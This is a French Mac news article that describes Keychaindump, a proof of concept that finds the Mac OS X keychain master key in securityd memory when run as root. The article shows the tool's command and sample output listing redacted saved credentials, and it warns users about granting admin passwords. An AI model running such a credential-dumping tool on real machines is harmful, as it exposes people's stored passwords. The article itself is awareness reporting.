Actualité

Avec votre mot de passe admin, une app a accès à vos mots de passe en clair

Par Didier, le

Le trousseau de Mac OS X est un outil formidable, permettant de centraliser vos mots de passe et surtout, de pouvoir les utiliser dans n'importe quel programme, tout en garantissant un certain niveau de sécurité.

Mais lorsque vous fournissez votre mot de passe administrateur à un programme, saviez-vous que ce dernier a potentiellement accès, en clair, à tous vos identifiant ?

Avec votre mot de passe admin, une app a accès à vos mots de passe en clair


Juuso Salonen a développé un mini-programme (non compilé) qui permet de démontrer que tout ceci est largement possible.

Keychaindump est une "preuve de concept" pour lire le trousseau de Mac OS X en tant que root. Son rôle est de trouver la clef principale du trousseau, stockée en mémoire du process securityd et de l'utiliser pour décrypter tous vos mots de passe

Voici un exemple de ce qu'est capable de fournir le programme :

$ sudo ./keychaindump
[[] Searching process 15 heap range 0x7fa809400000-0x7fa809500000
[]] Searching process 15 heap range 0x7fa809500000-0x7fa809600000
[[] Searching process 15 heap range 0x7fa809600000-0x7fa809700000
[]] Searching process 15 heap range 0x7fa80a900000-0x7fa80ac00000
[[] Found 17 master key candidates
[]] Trying to decrypt wrapping key in /Users/juusosalonen/Library/Keychains/login.keychain
[[] Trying master key candidate: b49ad51a672bd4be55a4eb4efdb90b242a5f262ba80a95df
[]] Trying master key candidate: 22b8aa80fa0700605f53994940fcfe9acc44eb1f4587f1ac
[[] Trying master key candidate: 1d7aa80fa0700f002005043210074b877579996d09b70000
[]] Trying master key candidate: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found master key: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found wrapping key: e9acc39947f1996df940fceb1f458ac74b877579f54409b7
xxxxxxx:192.168.1.1:xxxxxxx
xxxxxxx@gmail.com:login.facebook.com:xxxxxxx
xxxxxxx@gmail.com:smtp.google.com:xxxxxxx
xxxxxxx@gmail.com:imap.google.com:xxxxxxx
xxxxxxx:twitter.com:xxxxxxx
xxxxxxx@gmail.com:www.google.com:xxxxxxx
xxxxxxx:imap.gmail.com:xxxxxxx
...


Nous l'avons également testé de notre côté, avec succès et sur la dernière mise à jour de Mac OS X. Avec 500 petites lignes de code, il est donc possible pour n'importe quel développeur ayant les droits administrateurs, de récupérer tous vos mots de passe et identifiant, sans cryptage.

Voilà une nouvelle occasion de vous rappeler de rester prudent quand un programme vous demande votre mot de passe administrateur, sans raison apparente. S'il s'agit d'installer un pilote d'imprimante, rien de plus normal. Mais pour un petit jeu que vous avez téléchargé sur le net, il n'y a aucune raison que le développeur ait besoin de tels privilèges.

Tous les fichiers sources sont disponibles sur GitHub

Commentaires

Connectez-vous/créez un compte pour réagir à cet article !
Oops, vous n'êtes pas connecté

Pour évaluer un commentaire sur Mac4Ever, vous devez être connecté avec votre compte utilisateur.

31 commentaires
Connectez-vous/créez un compte pour réagir à cet article !
Oops, vous n'êtes pas connecté

Pour évaluer un commentaire sur Mac4Ever, vous devez être connecté avec votre compte utilisateur.

Suivez-nous !

Guide d'achat Mac

Voir le guide d'achat Mac

Dossiers Mac

Plus de dossiers Mac

Dernières vidéos

Voir toutes les videos